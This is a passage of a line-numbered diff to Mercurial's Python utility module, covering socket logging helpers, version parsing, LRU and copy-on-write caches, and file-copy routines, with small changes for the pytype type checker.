1063 1063 def sendto(self, res, data, flagsoraddress, address=None):
1064 1064 if not self.writes:
1065 1065 return
1066 1066
1067 1067 if address:
1068 1068 flags = flagsoraddress
1069 1069 else:
1070 1070 flags = 0
1071 1071
1072 1072 if self.logdataapis:
1073 1073 self.fh.write(
1074 1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 1075 % (self.name, len(data), flags, address, res)
1076 1076 )
1077 1077
1078 1078 self._writedata(data)
1079 1079
1080 1080 def setblocking(self, res, flag):
1081 1081 if not self.states:
1082 1082 return
1083 1083
1084 1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085 1085
1086 1086 def settimeout(self, res, value):
1087 1087 if not self.states:
1088 1088 return
1089 1089
1090 1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091 1091
1092 1092 def gettimeout(self, res):
1093 1093 if not self.states:
1094 1094 return
1095 1095
1096 1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097 1097
1098 1098 def setsockopt(self, res, level, optname, value):
1099 1099 if not self.states:
1100 1100 return
1101 1101
1102 1102 self.fh.write(
1103 1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 1104 % (self.name, level, optname, value, res)
1105 1105 )
1106 1106
1107 1107
1108 1108 def makeloggingsocket(
1109 1109 logh,
1110 1110 fh,
1111 1111 name,
1112 1112 reads=True,
1113 1113 writes=True,
1114 1114 states=True,
1115 1115 logdata=False,
1116 1116 logdataapis=True,
1117 1117 ):
1118 1118 """Turn a socket into a logging socket."""
1119 1119
1120 1120 observer = socketobserver(
1121 1121 logh,
1122 1122 name,
1123 1123 reads=reads,
1124 1124 writes=writes,
1125 1125 states=states,
1126 1126 logdata=logdata,
1127 1127 logdataapis=logdataapis,
1128 1128 )
1129 1129 return socketproxy(fh, observer)
1130 1130
1131 1131
1132 1132 def version():
1133 1133 """Return version information if available."""
1134 1134 try:
1135 1135 from . import __version__
1136 1136
1137 1137 return __version__.version
1138 1138 except ImportError:
1139 1139 return b'unknown'
1140 1140
1141 1141
1142 1142 def versiontuple(v=None, n=4):
1143 1143 """Parses a Mercurial version string into an N-tuple.
1144 1144
1145 1145 The version string to be parsed is specified with the ``v`` argument.
1146 1146 If it isn't defined, the current Mercurial version string will be parsed.
1147 1147
1148 1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1149 1149 returned values:
1150 1150
1151 1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, 1)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, 1, '190-df9b73d2d444')
1158 1158
1159 1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161 1161
1162 1162 >>> v = b'3.6'
1163 1163 >>> versiontuple(v, 2)
1164 1164 (3, 6)
1165 1165 >>> versiontuple(v, 3)
1166 1166 (3, 6, None)
1167 1167 >>> versiontuple(v, 4)
1168 1168 (3, 6, None, None)
1169 1169
1170 1170 >>> v = b'3.9-rc'
1171 1171 >>> versiontuple(v, 2)
1172 1172 (3, 9)
1173 1173 >>> versiontuple(v, 3)
1174 1174 (3, 9, None)
1175 1175 >>> versiontuple(v, 4)
1176 1176 (3, 9, None, 'rc')
1177 1177
1178 1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 1179 >>> versiontuple(v, 2)
1180 1180 (3, 9)
1181 1181 >>> versiontuple(v, 3)
1182 1182 (3, 9, None)
1183 1183 >>> versiontuple(v, 4)
1184 1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185 1185
1186 1186 >>> versiontuple(b'4.6rc0')
1187 1187 (4, 6, None, 'rc0')
1188 1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 1190 >>> versiontuple(b'.1.2.3')
1191 1191 (None, None, None, '.1.2.3')
1192 1192 >>> versiontuple(b'12.34..5')
1193 1193 (12, 34, None, '..5')
1194 1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 1195 (1, 2, 3, '.4.5.6')
1196 1196 """
1197 1197 if not v:
1198 1198 v = version()
1199 1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 1200 if not m:
1201 1201 vparts, extra = b'', v
1202 1202 elif m.group(2):
1203 1203 vparts, extra = m.groups()
1204 1204 else:
1205 1205 vparts, extra = m.group(1), None
1206 1206
1207 1207 assert vparts is not None # help pytype
1208 1208
1209 1209 vints = []
1210 1210 for i in vparts.split(b'.'):
1211 1211 try:
1212 1212 vints.append(int(i))
1213 1213 except ValueError:
1214 1214 break
1215 1215 # (3, 6) -> (3, 6, None)
1216 1216 while len(vints) < 3:
1217 1217 vints.append(None)
1218 1218
1219 1219 if n == 2:
1220 1220 return (vints[0], vints[1])
1221 1221 if n == 3:
1222 1222 return (vints[0], vints[1], vints[2])
1223 1223 if n == 4:
1224 1224 return (vints[0], vints[1], vints[2], extra)
1225 1225
1226 1226
1227 1227 def cachefunc(func):
1228 1228 '''cache the result of function calls'''
1229 1229 # XXX doesn't handle keywords args
1230 1230 if func.__code__.co_argcount == 0:
1231 1231 listcache = []
1232 1232
1233 1233 def f():
1234 1234 if len(listcache) == 0:
1235 1235 listcache.append(func())
1236 1236 return listcache[0]
1237 1237
1238 1238 return f
1239 1239 cache = {}
1240 1240 if func.__code__.co_argcount == 1:
1241 1241 # we gain a small amount of time because
1242 1242 # we don't need to pack/unpack the list
1243 1243 def f(arg):
1244 1244 if arg not in cache:
1245 1245 cache[arg] = func(arg)
1246 1246 return cache[arg]
1247 1247
1248 1248 else:
1249 1249
1250 1250 def f(*args):
1251 1251 if args not in cache:
1252 1252 cache[args] = func(*args)
1253 1253 return cache[args]
1254 1254
1255 1255 return f
1256 1256
1257 1257
1258 1258 class cow(object):
1259 1259 """helper class to make copy-on-write easier
1260 1260
1261 1261 Call preparewrite before doing any writes.
1262 1262 """
1263 1263
1264 1264 def preparewrite(self):
1265 1265 """call this before writes, return self or a copied new object"""
1266 1266 if getattr(self, '_copied', 0):
1267 1267 self._copied -= 1
1268 return self.__class__(self)
1268 # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count]
1269 return self.__class__(self) # pytype: disable=wrong-arg-count
1269 1270 return self
1270 1271
1271 1272 def copy(self):
1272 1273 """always do a cheap copy"""
1273 1274 self._copied = getattr(self, '_copied', 0) + 1
1274 1275 return self
1275 1276
1276 1277
1277 1278 class sortdict(collections.OrderedDict):
1278 1279 """a simple sorted dictionary
1279 1280
1280 1281 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 1282 >>> d2 = d1.copy()
1282 1283 >>> d2
1283 1284 sortdict([('a', 0), ('b', 1)])
1284 1285 >>> d2.update([(b'a', 2)])
1285 1286 >>> list(d2.keys()) # should still be in last-set order
1286 1287 ['b', 'a']
1287 1288 >>> d1.insert(1, b'a.5', 0.5)
1288 1289 >>> d1
1289 1290 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 1291 """
1291 1292
1292 1293 def __setitem__(self, key, value):
1293 1294 if key in self:
1294 1295 del self[key]
1295 1296 super(sortdict, self).__setitem__(key, value)
1296 1297
1297 1298 if pycompat.ispypy:
1298 1299 # __setitem__() isn't called as of PyPy 5.8.0
1299 1300 def update(self, src, **f):
1300 1301 if isinstance(src, dict):
1301 1302 src = pycompat.iteritems(src)
1302 1303 for k, v in src:
1303 1304 self[k] = v
1304 1305 for k in f:
1305 1306 self[k] = f[k]
1306 1307
1307 1308 def insert(self, position, key, value):
1308 1309 for (i, (k, v)) in enumerate(list(self.items())):
1309 1310 if i == position:
1310 1311 self[key] = value
1311 1312 if i >= position:
1312 1313 del self[k]
1313 1314 self[k] = v
1314 1315
1315 1316
1316 1317 class cowdict(cow, dict):
1317 1318 """copy-on-write dict
1318 1319
1319 1320 Be sure to call d = d.preparewrite() before writing to d.
1320 1321
1321 1322 >>> a = cowdict()
1322 1323 >>> a is a.preparewrite()
1323 1324 True
1324 1325 >>> b = a.copy()
1325 1326 >>> b is a
1326 1327 True
1327 1328 >>> c = b.copy()
1328 1329 >>> c is a
1329 1330 True
1330 1331 >>> a = a.preparewrite()
1331 1332 >>> b is a
1332 1333 False
1333 1334 >>> a is a.preparewrite()
1334 1335 True
1335 1336 >>> c = c.preparewrite()
1336 1337 >>> b is c
1337 1338 False
1338 1339 >>> b is b.preparewrite()
1339 1340 True
1340 1341 """
1341 1342
1342 1343
1343 1344 class cowsortdict(cow, sortdict):
1344 1345 """copy-on-write sortdict
1345 1346
1346 1347 Be sure to call d = d.preparewrite() before writing to d.
1347 1348 """
1348 1349
1349 1350
1350 1351 class transactional(object): # pytype: disable=ignored-metaclass
1351 1352 """Base class for making a transactional type into a context manager."""
1352 1353
1353 1354 __metaclass__ = abc.ABCMeta
1354 1355
1355 1356 @abc.abstractmethod
1356 1357 def close(self):
1357 1358 """Successfully closes the transaction."""
1358 1359
1359 1360 @abc.abstractmethod
1360 1361 def release(self):
1361 1362 """Marks the end of the transaction.
1362 1363
1363 1364 If the transaction has not been closed, it will be aborted.
1364 1365 """
1365 1366
1366 1367 def __enter__(self):
1367 1368 return self
1368 1369
1369 1370 def __exit__(self, exc_type, exc_val, exc_tb):
1370 1371 try:
1371 1372 if exc_type is None:
1372 1373 self.close()
1373 1374 finally:
1374 1375 self.release()
1375 1376
1376 1377
1377 1378 @contextlib.contextmanager
1378 1379 def acceptintervention(tr=None):
1379 1380 """A context manager that closes the transaction on InterventionRequired
1380 1381
1381 1382 If no transaction was provided, this simply runs the body and returns
1382 1383 """
1383 1384 if not tr:
1384 1385 yield
1385 1386 return
1386 1387 try:
1387 1388 yield
1388 1389 tr.close()
1389 1390 except error.InterventionRequired:
1390 1391 tr.close()
1391 1392 raise
1392 1393 finally:
1393 1394 tr.release()
1394 1395
1395 1396
1396 1397 @contextlib.contextmanager
1397 1398 def nullcontextmanager(enter_result=None):
1398 1399 yield enter_result
1399 1400
1400 1401
1401 1402 class _lrucachenode(object):
1402 1403 """A node in a doubly linked list.
1403 1404
1404 1405 Holds a reference to nodes on either side as well as a key-value
1405 1406 pair for the dictionary entry.
1406 1407 """
1407 1408
1408 1409 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1409 1410
1410 1411 def __init__(self):
1411 self.next = None
1412 self.prev = None
1412 self.next = self
1413 self.prev = self
1413 1414
1414 1415 self.key = _notset
1415 1416 self.value = None
1416 1417 self.cost = 0
1417 1418
1418 1419 def markempty(self):
1419 1420 """Mark the node as emptied."""
1420 1421 self.key = _notset
1421 1422 self.value = None
1422 1423 self.cost = 0
1423 1424
1424 1425
1425 1426 class lrucachedict(object):
1426 1427 """Dict that caches most recent accesses and sets.
1427 1428
1428 1429 The dict consists of an actual backing dict - indexed by original
1429 1430 key - and a doubly linked circular list defining the order of entries in
1430 1431 the cache.
1431 1432
1432 1433 The head node is the newest entry in the cache. If the cache is full,
1433 1434 we recycle head.prev and make it the new head. Cache accesses result in
1434 1435 the node being moved to before the existing head and being marked as the
1435 1436 new head node.
1436 1437
1437 1438 Items in the cache can be inserted with an optional "cost" value. This is
1438 1439 simply an integer that is specified by the caller. The cache can be queried
1439 1440 for the total cost of all items presently in the cache.
1440 1441
1441 1442 The cache can also define a maximum cost. If a cache insertion would
1442 1443 cause the total cost of the cache to go beyond the maximum cost limit,
1443 1444 nodes will be evicted to make room for the new code. This can be used
1444 1445 to e.g. set a max memory limit and associate an estimated bytes size
1445 1446 cost to each item in the cache. By default, no maximum cost is enforced.
1446 1447 """
1447 1448
1448 1449 def __init__(self, max, maxcost=0):
1449 1450 self._cache = {}
1450 1451
1451 self._head = head = _lrucachenode()
1452 head.prev = head
1453 head.next = head
1452 self._head = _lrucachenode()
1454 1453 self._size = 1
1455 1454 self.capacity = max
1456 1455 self.totalcost = 0
1457 1456 self.maxcost = maxcost
1458 1457
1459 1458 def __len__(self):
1460 1459 return len(self._cache)
1461 1460
1462 1461 def __contains__(self, k):
1463 1462 return k in self._cache
1464 1463
1465 1464 def __iter__(self):
1466 1465 # We don't have to iterate in cache order, but why not.
1467 1466 n = self._head
1468 1467 for i in range(len(self._cache)):
1469 1468 yield n.key
1470 1469 n = n.next
1471 1470
1472 1471 def __getitem__(self, k):
1473 1472 node = self._cache[k]
1474 1473 self._movetohead(node)
1475 1474 return node.value
1476 1475
1477 1476 def insert(self, k, v, cost=0):
1478 1477 """Insert a new item in the cache with optional cost value."""
1479 1478 node = self._cache.get(k)
1480 1479 # Replace existing value and mark as newest.
1481 1480 if node is not None:
1482 1481 self.totalcost -= node.cost
1483 1482 node.value = v
1484 1483 node.cost = cost
1485 1484 self.totalcost += cost
1486 1485 self._movetohead(node)
1487 1486
1488 1487 if self.maxcost:
1489 1488 self._enforcecostlimit()
1490 1489
1491 1490 return
1492 1491
1493 1492 if self._size < self.capacity:
1494 1493 node = self._addcapacity()
1495 1494 else:
1496 1495 # Grab the last/oldest item.
1497 1496 node = self._head.prev
1498 1497
1499 1498 # At capacity. Kill the old entry.
1500 1499 if node.key is not _notset:
1501 1500 self.totalcost -= node.cost
1502 1501 del self._cache[node.key]
1503 1502
1504 1503 node.key = k
1505 1504 node.value = v
1506 1505 node.cost = cost
1507 1506 self.totalcost += cost
1508 1507 self._cache[k] = node
1509 1508 # And mark it as newest entry. No need to adjust order since it
1510 1509 # is already self._head.prev.
1511 1510 self._head = node
1512 1511
1513 1512 if self.maxcost:
1514 1513 self._enforcecostlimit()
1515 1514
1516 1515 def __setitem__(self, k, v):
1517 1516 self.insert(k, v)
1518 1517
1519 1518 def __delitem__(self, k):
1520 1519 self.pop(k)
1521 1520
1522 1521 def pop(self, k, default=_notset):
1523 1522 try:
1524 1523 node = self._cache.pop(k)
1525 1524 except KeyError:
1526 1525 if default is _notset:
1527 1526 raise
1528 1527 return default
1529 1528
1530 1529 assert node is not None # help pytype
1531 1530 value = node.value
1532 1531 self.totalcost -= node.cost
1533 1532 node.markempty()
1534 1533
1535 1534 # Temporarily mark as newest item before re-adjusting head to make
1536 1535 # this node the oldest item.
1537 1536 self._movetohead(node)
1538 1537 self._head = node.next
1539 1538
1540 1539 return value
1541 1540
1542 1541 # Additional dict methods.
1543 1542
1544 1543 def get(self, k, default=None):
1545 1544 try:
1546 1545 return self.__getitem__(k)
1547 1546 except KeyError:
1548 1547 return default
1549 1548
1550 1549 def peek(self, k, default=_notset):
1551 1550 """Get the specified item without moving it to the head
1552 1551
1553 1552 Unlike get(), this doesn't mutate the internal state. But be aware
1554 1553 that it doesn't mean peek() is thread safe.
1555 1554 """
1556 1555 try:
1557 1556 node = self._cache[k]
1557 assert node is not None # help pytype
1558 1558 return node.value
1559 1559 except KeyError:
1560 1560 if default is _notset:
1561 1561 raise
1562 1562 return default
1563 1563
1564 1564 def clear(self):
1565 1565 n = self._head
1566 1566 while n.key is not _notset:
1567 1567 self.totalcost -= n.cost
1568 1568 n.markempty()
1569 1569 n = n.next
1570 1570
1571 1571 self._cache.clear()
1572 1572
1573 1573 def copy(self, capacity=None, maxcost=0):
1574 1574 """Create a new cache as a copy of the current one.
1575 1575
1576 1576 By default, the new cache has the same capacity as the existing one.
1577 1577 But, the cache capacity can be changed as part of performing the
1578 1578 copy.
1579 1579
1580 1580 Items in the copy have an insertion/access order matching this
1581 1581 instance.
1582 1582 """
1583 1583
1584 1584 capacity = capacity or self.capacity
1585 1585 maxcost = maxcost or self.maxcost
1586 1586 result = lrucachedict(capacity, maxcost=maxcost)
1587 1587
1588 1588 # We copy entries by iterating in oldest-to-newest order so the copy
1589 1589 # has the correct ordering.
1590 1590
1591 1591 # Find the first non-empty entry.
1592 1592 n = self._head.prev
1593 1593 while n.key is _notset and n is not self._head:
1594 1594 n = n.prev
1595 1595
1596 1596 # We could potentially skip the first N items when decreasing capacity.
1597 1597 # But let's keep it simple unless it is a performance problem.
1598 1598 for i in range(len(self._cache)):
1599 1599 result.insert(n.key, n.value, cost=n.cost)
1600 1600 n = n.prev
1601 1601
1602 1602 return result
1603 1603
1604 1604 def popoldest(self):
1605 1605 """Remove the oldest item from the cache.
1606 1606
1607 1607 Returns the (key, value) describing the removed cache entry.
1608 1608 """
1609 1609 if not self._cache:
1610 1610 return
1611 1611
1612 1612 # Walk the linked list backwards starting at tail node until we hit
1613 1613 # a non-empty node.
1614 1614 n = self._head.prev
1615
1616 assert n is not None # help pytype
1617
1615 1618 while n.key is _notset:
1616 1619 n = n.prev
1617 1620
1618 1621 assert n is not None # help pytype
1619 1622
1620 1623 key, value = n.key, n.value
1621 1624
1622 1625 # And remove it from the cache and mark it as empty.
1623 1626 del self._cache[n.key]
1624 1627 self.totalcost -= n.cost
1625 1628 n.markempty()
1626 1629
1627 1630 return key, value
1628 1631
1629 1632 def _movetohead(self, node):
1630 1633 """Mark a node as the newest, making it the new head.
1631 1634
1632 1635 When a node is accessed, it becomes the freshest entry in the LRU
1633 1636 list, which is denoted by self._head.
1634 1637
1635 1638 Visually, let's make ``N`` the new head node (* denotes head):
1636 1639
1637 1640 previous/oldest <-> head <-> next/next newest
1638 1641
1639 1642 ----<->--- A* ---<->-----
1640 1643 | |
1641 1644 E <-> D <-> N <-> C <-> B
1642 1645
1643 1646 To:
1644 1647
1645 1648 ----<->--- N* ---<->-----
1646 1649 | |
1647 1650 E <-> D <-> C <-> B <-> A
1648 1651
1649 1652 This requires the following moves:
1650 1653
1651 1654 C.next = D (node.prev.next = node.next)
1652 1655 D.prev = C (node.next.prev = node.prev)
1653 1656 E.next = N (head.prev.next = node)
1654 1657 N.prev = E (node.prev = head.prev)
1655 1658 N.next = A (node.next = head)
1656 1659 A.prev = N (head.prev = node)
1657 1660 """
1658 1661 head = self._head
1659 1662 # C.next = D
1660 1663 node.prev.next = node.next
1661 1664 # D.prev = C
1662 1665 node.next.prev = node.prev
1663 1666 # N.prev = E
1664 1667 node.prev = head.prev
1665 1668 # N.next = A
1666 1669 # It is tempting to do just "head" here, however if node is
1667 1670 # adjacent to head, this will do bad things.
1668 1671 node.next = head.prev.next
1669 1672 # E.next = N
1670 1673 node.next.prev = node
1671 1674 # A.prev = N
1672 1675 node.prev.next = node
1673 1676
1674 1677 self._head = node
1675 1678
1676 1679 def _addcapacity(self):
1677 1680 """Add a node to the circular linked list.
1678 1681
1679 1682 The new node is inserted before the head node.
1680 1683 """
1681 1684 head = self._head
1682 1685 node = _lrucachenode()
1683 1686 head.prev.next = node
1684 1687 node.prev = head.prev
1685 1688 node.next = head
1686 1689 head.prev = node
1687 1690 self._size += 1
1688 1691 return node
1689 1692
1690 1693 def _enforcecostlimit(self):
1691 1694 # This should run after an insertion. It should only be called if total
1692 1695 # cost limits are being enforced.
1693 1696 # The most recently inserted node is never evicted.
1694 1697 if len(self) <= 1 or self.totalcost <= self.maxcost:
1695 1698 return
1696 1699
1697 1700 # This is logically equivalent to calling popoldest() until we
1698 1701 # free up enough cost. We don't do that since popoldest() needs
1699 1702 # to walk the linked list and doing this in a loop would be
1700 1703 # quadratic. So we find the first non-empty node and then
1701 1704 # walk nodes until we free up enough capacity.
1702 1705 #
1703 1706 # If we only removed the minimum number of nodes to free enough
1704 1707 # cost at insert time, chances are high that the next insert would
1705 1708 # also require pruning. This would effectively constitute quadratic
1706 1709 # behavior for insert-heavy workloads. To mitigate this, we set a
1707 1710 # target cost that is a percentage of the max cost. This will tend
1708 1711 # to free more nodes when the high water mark is reached, which
1709 1712 # lowers the chances of needing to prune on the subsequent insert.
1710 1713 targetcost = int(self.maxcost * 0.75)
1711 1714
1712 1715 n = self._head.prev
1713 1716 while n.key is _notset:
1714 1717 n = n.prev
1715 1718
1716 1719 while len(self) > 1 and self.totalcost > targetcost:
1717 1720 del self._cache[n.key]
1718 1721 self.totalcost -= n.cost
1719 1722 n.markempty()
1720 1723 n = n.prev
1721 1724
1722 1725
1723 1726 def lrucachefunc(func):
1724 1727 '''cache most recent results of function calls'''
1725 1728 cache = {}
1726 1729 order = collections.deque()
1727 1730 if func.__code__.co_argcount == 1:
1728 1731
1729 1732 def f(arg):
1730 1733 if arg not in cache:
1731 1734 if len(cache) > 20:
1732 1735 del cache[order.popleft()]
1733 1736 cache[arg] = func(arg)
1734 1737 else:
1735 1738 order.remove(arg)
1736 1739 order.append(arg)
1737 1740 return cache[arg]
1738 1741
1739 1742 else:
1740 1743
1741 1744 def f(*args):
1742 1745 if args not in cache:
1743 1746 if len(cache) > 20:
1744 1747 del cache[order.popleft()]
1745 1748 cache[args] = func(*args)
1746 1749 else:
1747 1750 order.remove(args)
1748 1751 order.append(args)
1749 1752 return cache[args]
1750 1753
1751 1754 return f
1752 1755
1753 1756
1754 1757 class propertycache(object):
1755 1758 def __init__(self, func):
1756 1759 self.func = func
1757 1760 self.name = func.__name__
1758 1761
1759 1762 def __get__(self, obj, type=None):
1760 1763 result = self.func(obj)
1761 1764 self.cachevalue(obj, result)
1762 1765 return result
1763 1766
1764 1767 def cachevalue(self, obj, value):
1765 1768 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1766 1769 obj.__dict__[self.name] = value
1767 1770
1768 1771
1769 1772 def clearcachedproperty(obj, prop):
1770 1773 '''clear a cached property value, if one has been set'''
1771 1774 prop = pycompat.sysstr(prop)
1772 1775 if prop in obj.__dict__:
1773 1776 del obj.__dict__[prop]
1774 1777
1775 1778
1776 1779 def increasingchunks(source, min=1024, max=65536):
1777 1780 """return no less than min bytes per chunk while data remains,
1778 1781 doubling min after each chunk until it reaches max"""
1779 1782
1780 1783 def log2(x):
1781 1784 if not x:
1782 1785 return 0
1783 1786 i = 0
1784 1787 while x:
1785 1788 x >>= 1
1786 1789 i += 1
1787 1790 return i - 1
1788 1791
1789 1792 buf = []
1790 1793 blen = 0
1791 1794 for chunk in source:
1792 1795 buf.append(chunk)
1793 1796 blen += len(chunk)
1794 1797 if blen >= min:
1795 1798 if min < max:
1796 1799 min = min << 1
1797 1800 nmin = 1 << log2(blen)
1798 1801 if nmin > min:
1799 1802 min = nmin
1800 1803 if min > max:
1801 1804 min = max
1802 1805 yield b''.join(buf)
1803 1806 blen = 0
1804 1807 buf = []
1805 1808 if buf:
1806 1809 yield b''.join(buf)
1807 1810
1808 1811
1809 1812 def always(fn):
1810 1813 return True
1811 1814
1812 1815
1813 1816 def never(fn):
1814 1817 return False
1815 1818
1816 1819
1817 1820 def nogc(func):
1818 1821 """disable garbage collector
1819 1822
1820 1823 Python's garbage collector triggers a GC each time a certain number of
1821 1824 container objects (the number being defined by gc.get_threshold()) are
1822 1825 allocated even when marked not to be tracked by the collector. Tracking has
1823 1826 no effect on when GCs are triggered, only on what objects the GC looks
1824 1827 into. As a workaround, disable GC while building complex (huge)
1825 1828 containers.
1826 1829
1827 1830 This garbage collector issue have been fixed in 2.7. But it still affect
1828 1831 CPython's performance.
1829 1832 """
1830 1833
1831 1834 def wrapper(*args, **kwargs):
1832 1835 gcenabled = gc.isenabled()
1833 1836 gc.disable()
1834 1837 try:
1835 1838 return func(*args, **kwargs)
1836 1839 finally:
1837 1840 if gcenabled:
1838 1841 gc.enable()
1839 1842
1840 1843 return wrapper
1841 1844
1842 1845
1843 1846 if pycompat.ispypy:
1844 1847 # PyPy runs slower with gc disabled
1845 1848 nogc = lambda x: x
1846 1849
1847 1850
1848 1851 def pathto(root, n1, n2):
1849 1852 # type: (bytes, bytes, bytes) -> bytes
1850 1853 """return the relative path from one place to another.
1851 1854 root should use os.sep to separate directories
1852 1855 n1 should use os.sep to separate directories
1853 1856 n2 should use "/" to separate directories
1854 1857 returns an os.sep-separated path.
1855 1858
1856 1859 If n1 is a relative path, it's assumed it's
1857 1860 relative to root.
1858 1861 n2 should always be relative to root.
1859 1862 """
1860 1863 if not n1:
1861 1864 return localpath(n2)
1862 1865 if os.path.isabs(n1):
1863 1866 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1864 1867 return os.path.join(root, localpath(n2))
1865 1868 n2 = b'/'.join((pconvert(root), n2))
1866 1869 a, b = splitpath(n1), n2.split(b'/')
1867 1870 a.reverse()
1868 1871 b.reverse()
1869 1872 while a and b and a[-1] == b[-1]:
1870 1873 a.pop()
1871 1874 b.pop()
1872 1875 b.reverse()
1873 1876 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1874 1877
1875 1878
1876 1879 def checksignature(func, depth=1):
1877 1880 '''wrap a function with code to check for calling errors'''
1878 1881
1879 1882 def check(*args, **kwargs):
1880 1883 try:
1881 1884 return func(*args, **kwargs)
1882 1885 except TypeError:
1883 1886 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1884 1887 raise error.SignatureError
1885 1888 raise
1886 1889
1887 1890 return check
1888 1891
1889 1892
1890 1893 # a whilelist of known filesystems where hardlink works reliably
1891 1894 _hardlinkfswhitelist = {
1892 1895 b'apfs',
1893 1896 b'btrfs',
1894 1897 b'ext2',
1895 1898 b'ext3',
1896 1899 b'ext4',
1897 1900 b'hfs',
1898 1901 b'jfs',
1899 1902 b'NTFS',
1900 1903 b'reiserfs',
1901 1904 b'tmpfs',
1902 1905 b'ufs',
1903 1906 b'xfs',
1904 1907 b'zfs',
1905 1908 }
1906 1909
1907 1910
1908 1911 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1909 1912 """copy a file, preserving mode and optionally other stat info like
1910 1913 atime/mtime
1911 1914
1912 1915 checkambig argument is used with filestat, and is useful only if
1913 1916 destination file is guarded by any lock (e.g. repo.lock or
1914 1917 repo.wlock).
1915 1918
1916 1919 copystat and checkambig should be exclusive.
1917 1920 """
1918 1921 assert not (copystat and checkambig)
1919 1922 oldstat = None
1920 1923 if os.path.lexists(dest):
1921 1924 if checkambig:
1922 1925 oldstat = checkambig and filestat.frompath(dest)
1923 1926 unlink(dest)
1924 1927 if hardlink:
1925 1928 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1926 1929 # unless we are confident that dest is on a whitelisted filesystem.
1927 1930 try:
1928 1931 fstype = getfstype(os.path.dirname(dest))
1929 1932 except OSError:
1930 1933 fstype = None
1931 1934 if fstype not in _hardlinkfswhitelist:
1932 1935 hardlink = False
1933 1936 if hardlink:
1934 1937 try:
1935 1938 oslink(src, dest)
1936 1939 return
1937 1940 except (IOError, OSError):
1938 1941 pass # fall back to normal copy
1939 1942 if os.path.islink(src):
1940 1943 os.symlink(os.readlink(src), dest)
1941 1944 # copytime is ignored for symlinks, but in general copytime isn't needed
1942 1945 # for them anyway
1943 1946 else:
1944 1947 try:
1945 1948 shutil.copyfile(src, dest)
1946 1949 if copystat:
1947 1950 # copystat also copies mode
1948 1951 shutil.copystat(src, dest)
1949 1952 else:
1950 1953 shutil.copymode(src, dest)
1951 1954 if oldstat and oldstat.stat:
1952 1955 newstat = filestat.frompath(dest)
1953 1956 if newstat.isambig(oldstat):
1954 1957 # stat of copied file is ambiguous to original one
1955 1958 advanced = (
1956 1959 oldstat.stat[stat.ST_MTIME] + 1
1957 1960 ) & 0x7FFFFFFF
1958 1961 os.utime(dest, (advanced, advanced))
1959 1962 except shutil.Error as inst:
1960 1963 raise error.Abort(stringutil.forcebytestr(inst))
1961 1964
1962 1965
1963 1966 def copyfiles(src, dst, hardlink=None, progress=None):
1964 1967 """Copy a directory tree using hardlinks if possible."""
1965 1968 num = 0
1966 1969
1967 1970 def settopic():
1968 1971 if progress:
1969 1972 progress.topic = _(b'linking') if hardlink else _(b'copying')
1970 1973
1971 1974 if os.path.isdir(src):
1972 1975 if hardlink is None:
1973 1976 hardlink = (
1974 1977 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1975 1978 )
1976 1979 settopic()
1977 1980 os.mkdir(dst)
1978 1981 for name, kind in listdir(src):
1979 1982 srcname = os.path.join(src, name)
1980 1983 dstname = os.path.join(dst, name)
1981 1984 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1982 1985 num += n
1983 1986 else:
1984 1987 if hardlink is None:
1985 1988 hardlink = (
1986 1989 os.stat(os.path.dirname(src)).st_dev
1987 1990 == os.stat(os.path.dirname(dst)).st_dev
1988 1991 )
1989 1992 settopic()
1990 1993
1991 1994 if hardlink:
1992 1995 try:
1993 1996 oslink(src, dst)
1994 1997 except (IOError, OSError):
1995 1998 hardlink = False
1996 1999 shutil.copy(src, dst)
1997 2000 else:
1998 2001 shutil.copy(src, dst)
1999 2002 num += 1
2000 2003 if progress:
2001 2004 progress.increment()
2002 2005
2003 2006 return hardlink, num
2004 2007
2005 2008
2006 2009 _winreservednames = {
2007 2010 b'con',
2008 2011 b'prn',
2009 2012 b'aux',
2010 2013 b'nul',
2011 2014 b'com1',
2012 2015 b'com2',
2013 2016 b'com3',
2014 2017 b'com4',
2015 2018 b'com5',
2016 2019 b'com6',
2017 2020 b'com7',
2018 2021 b'com8',
2019 2022 b'com9',
2020 2023 b'lpt1',
2021 2024 b'lpt2',
2022 2025 b'lpt3',
2023 2026 b'lpt4',
2024 2027 b'lpt5',
2025 2028 b'lpt6',
2026 2029 b'lpt7',
2027 2030 b'lpt8',
2028 2031 b'lpt9',
2029 2032 }
2030 2033 _winreservedchars = b':*?"<>|'
2031 2034
2032 2035
2033 2036 def checkwinfilename(path):
2034 2037 # type: (bytes) -> Optional[bytes]
2035 2038 r"""Check that the base-relative path is a valid filename on Windows.
2036 2039 Returns None if the path is ok, or a UI string describing the problem.
2037 2040
2038 2041 >>> checkwinfilename(b"just/a/normal/path")
2039 2042 >>> checkwinfilename(b"foo/bar/con.xml")
2040 2043 "filename contains 'con', which is reserved on Windows"
2041 2044 >>> checkwinfilename(b"foo/con.xml/bar")
